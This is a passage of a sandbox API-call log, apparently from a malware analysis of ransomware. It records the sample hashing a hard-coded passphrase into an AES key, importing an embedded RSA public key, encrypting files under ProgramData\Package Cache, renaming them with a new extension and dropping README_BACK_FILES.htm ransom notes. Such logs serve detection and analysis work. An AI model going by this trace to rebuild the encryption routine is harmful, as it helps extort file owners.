PublicKey.cbData=0x8c, PublicKey.pbData=0x2868d40*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x27eac10) returned 1 [0238.150] CryptEncrypt (in: hKey=0x27eac10, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0238.151] CryptEncrypt (in: hKey=0x27eac10, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x285acf0*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x285acf0*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0238.151] WriteFile (in: hFile=0xffffffff, lpBuffer=0x285acf0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0238.151] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0238.151] CryptEncrypt (in: hKey=0x27eaa10, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0238.151] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0238.151] CloseHandle (hObject=0xffffffff) returned 1 [0238.151] CloseHandle (hObject=0xffffffff) returned 1 [0238.151] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab.gsg" (normalized: "c:\\programdata\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\cab1.cab.gsg"), lpNewFileName="C:\\\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\cab1.cab"), bFailIfExists=0) returned 0 [0238.152] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab", dwFileAttributes=0x0) returned 0 [0238.152] DeleteFileA (lpFileName="C:\\\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab.gsg" (normalized: "c:\\programdata\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\cab1.cab.gsg")) returned 0 [0238.152] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\cab1.cab"), lpNewFileName="C:\\\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab.fuck" (normalized: "c:\\programdata\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\cab1.cab.fuck")) returned 0 [0238.152] CryptDestroyHash (hHash=0x27ea810) returned 1 [0238.152] CryptDestroyKey (hKey=0x27eaa10) returned 1 [0238.152] CryptReleaseContext (hProv=0x285a9c0, dwFlags=0x0) returned 1 [0238.152] FindNextFileA (in: hFindFile=0x27ea990, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0238.153] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0238.153] GetLastError () returned 0x5 [0238.153] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi" (normalized: "c:\\programdata\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi")) returned 0x20 [0238.153] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi", dwFileAttributes=0x80) returned 0 [0238.153] CreateFileA (lpFileName="C:\\\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi" (normalized: "c:\\programdata\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.153] CreateFileA (lpFileName="C:\\\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi.gsg" (normalized: "c:\\programdata\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.154] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi.gsg", dwFileAttributes=0x2) returned 0 [0238.154] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x285a9c0) returned 1 [0238.156] CryptCreateHash (in: hProv=0x285a9c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0238.156] lstrlenA (lpString="GASinrxNGZdGxepxtSAFGoQZzMlQm") returned 29 [0238.156] CryptHashData (hHash=0x27eaa10, pbData=0x2ecb20, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0238.156] CryptDeriveKey (in: hProv=0x285a9c0, Algid=0x6610, hBaseData=0x27eaa10, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x27ea910) returned 1 [0238.156] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----m", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0238.156] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0238.156] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x285ab58) returned 1 [0238.157] CryptImportPublicKeyInfo (in: hCryptProv=0x285ab58, dwCertEncodingType=0x1, pInfo=0x2868a98*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2868ac8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2868ad0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x27eaa90) returned 1 [0238.157] CryptEncrypt (in: hKey=0x27eaa90, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0238.157] CryptEncrypt (in: hKey=0x27eaa90, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x285a828*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x285a828*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0238.157] WriteFile (in: hFile=0xffffffff, lpBuffer=0x285a828, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0238.157] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0238.157] CryptEncrypt (in: hKey=0x27ea910, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0238.157] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0238.157] CloseHandle (hObject=0xffffffff) returned 1 [0238.157] CloseHandle (hObject=0xffffffff) returned 1 [0238.157] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi.gsg" (normalized: "c:\\programdata\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi.gsg"), lpNewFileName="C:\\\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi" (normalized: "c:\\programdata\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi"), bFailIfExists=0) returned 0 [0238.158] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi", dwFileAttributes=0x0) returned 0 [0238.158] DeleteFileA (lpFileName="C:\\\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi.gsg" (normalized: "c:\\programdata\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi.gsg")) returned 0 [0238.158] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi" (normalized: "c:\\programdata\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi"), lpNewFileName="C:\\\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi.fuck" (normalized: "c:\\programdata\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi.fuck")) returned 0 [0238.159] CryptDestroyHash (hHash=0x27eaa10) returned 1 [0238.159] CryptDestroyKey (hKey=0x27ea910) returned 1 [0238.159] CryptReleaseContext (hProv=0x285a9c0, dwFlags=0x0) returned 1 [0238.159] FindNextFileA (in: hFindFile=0x27ea990, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0238.159] FindClose (in: hFindFile=0x27ea990 | out: hFindFile=0x27ea990) returned 1 [0238.159] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\readme_back_files.htm")) returned 0xffffffff [0238.159] AreFileApisANSI () returned 1 [0238.159] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286ccc8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 132 [0238.159] CreateFileW (lpFileName="C:\\\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.159] GetLastError () returned 0x5 [0238.159] GetLastError () returned 0x5 [0238.159] FindNextFileA (in: hFindFile=0x27eae90, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0238.160] FindClose (in: hFindFile=0x27eae90 | out: hFindFile=0x27eae90) returned 1 [0238.160] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\readme_back_files.htm")) returned 0xffffffff [0238.160] AreFileApisANSI () returned 1 [0238.160] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2a30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 111 [0238.160] CreateFileW (lpFileName="C:\\\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.160] GetLastError () returned 0x5 [0238.160] GetLastError () returned 0x5 [0238.160] FindNextFileA (in: hFindFile=0x27eaf10, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0 [0238.160] FindClose (in: hFindFile=0x27eaf10 | out: hFindFile=0x27eaf10) returned 1 [0238.160] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\readme_back_files.htm")) returned 0xffffffff [0238.160] AreFileApisANSI () returned 1 [0238.160] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2d78, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 102 [0238.161] CreateFileW (lpFileName="C:\\\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9f2e4, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.161] GetLastError () returned 0x5 [0238.161] GetLastError () returned 0x5 [0238.161] FindNextFileA (in: hFindFile=0x28463e0, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0238.161] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\*.*", lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0x27eac90 [0238.161] FindNextFileA (in: hFindFile=0x27eac90, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0238.161] FindNextFileA (in: hFindFile=0x27eac90, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0238.161] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x27eaa50 [0238.161] FindNextFileA (in: hFindFile=0x27eaa50, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0238.161] FindNextFileA (in: hFindFile=0x27eaa50, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0238.161] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x27eacd0 [0238.162] FindNextFileA (in: hFindFile=0x27eacd0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0238.162] FindNextFileA (in: hFindFile=0x27eacd0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0238.162] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0238.162] GetLastError () returned 0x5 [0238.163] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{be960c1c-7bad-3de6-8b1a-2616fe532845}v14.0.23026\\packages\\vcruntimeadditional_x86\\cab1.cab")) returned 0x20 [0238.163] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\cab1.cab", dwFileAttributes=0x80) returned 0 [0238.163] CreateFileA (lpFileName="C:\\\\ProgramData\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{be960c1c-7bad-3de6-8b1a-2616fe532845}v14.0.23026\\packages\\vcruntimeadditional_x86\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.163] CreateFileA (lpFileName="C:\\\\ProgramData\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\cab1.cab.gsg" (normalized: "c:\\programdata\\package cache\\{be960c1c-7bad-3de6-8b1a-2616fe532845}v14.0.23026\\packages\\vcruntimeadditional_x86\\cab1.cab.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.164] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\cab1.cab.gsg", dwFileAttributes=0x2) returned 0 [0238.164] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x285a9c0) returned 1 [0238.166] CryptCreateHash (in: hProv=0x285a9c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0238.166] lstrlenA (lpString="GASinrxNGZdGxepxtSAFGoQZzMlQm") returned 29 [0238.166] CryptHashData (hHash=0x27ea810, pbData=0x2ec878, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0238.166] CryptDeriveKey (in: hProv=0x285a9c0, Algid=0x6610, hBaseData=0x27ea810, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x27ead10) returned 1 [0238.166] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----t", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0238.166] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0238.166] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x285b680) returned 1 [0238.166] CryptImportPublicKeyInfo (in: hCryptProv=0x285b680, dwCertEncodingType=0x1, pInfo=0x2869a08*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2869a38*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2869a40*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x27eadd0) returned 1 [0238.166] CryptEncrypt (in: hKey=0x27eadd0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0238.166] CryptEncrypt (in: hKey=0x27eadd0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x285b4e8*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x285b4e8*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0238.167] WriteFile (in: hFile=0xffffffff, lpBuffer=0x285b4e8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0238.167] ReadFile (in: hFile=0xffffffff, lpBuffer=0x279a780, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x279a780, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0238.167] CryptEncrypt (in: hKey=0x27ead10, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x279a780*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x279a780*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0238.167] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279a780, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0238.167] CloseHandle (hObject=0xffffffff) returned 1 [0238.167] CloseHandle (hObject=0xffffffff) returned 1 [0238.167] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\cab1.cab.gsg" (normalized: "c:\\programdata\\package cache\\{be960c1c-7bad-3de6-8b1a-2616fe532845}v14.0.23026\\packages\\vcruntimeadditional_x86\\cab1.cab.gsg"), lpNewFileName="C:\\\\ProgramData\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{be960c1c-7bad-3de6-8b1a-2616fe532845}v14.0.23026\\packages\\vcruntimeadditional_x86\\cab1.cab"), bFailIfExists=0) returned 0 [0238.168] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\cab1.cab", dwFileAttributes=0x0) returned 0 [0238.168] DeleteFileA (lpFileName="C:\\\\ProgramData\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\cab1.cab.gsg" (normalized: "c:\\programdata\\package cache\\{be960c1c-7bad-3de6-8b1a-2616fe532845}v14.0.23026\\packages\\vcruntimeadditional_x86\\cab1.cab.gsg")) returned 0 [0238.168] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{be960c1c-7bad-3de6-8b1a-2616fe532845}v14.0.23026\\packages\\vcruntimeadditional_x86\\cab1.cab"), lpNewFileName="C:\\\\ProgramData\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\cab1.cab.fuck" (normalized: "c:\\programdata\\package cache\\{be960c1c-7bad-3de6-8b1a-2616fe532845}v14.0.23026\\packages\\vcruntimeadditional_x86\\cab1.cab.fuck")) returned 0 [0238.168] CryptDestroyHash (hHash=0x27ea810) returned 1 [0238.168] CryptDestroyKey (hKey=0x27ead10) returned 1 [0238.168] CryptReleaseContext (hProv=0x285a9c0, dwFlags=0x0) returned 1 [0238.168] FindNextFileA (in: hFindFile=0x27eacd0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0238.169] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0238.169] GetLastError () returned 0x5 [0238.169] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" (normalized: "c:\\programdata\\package 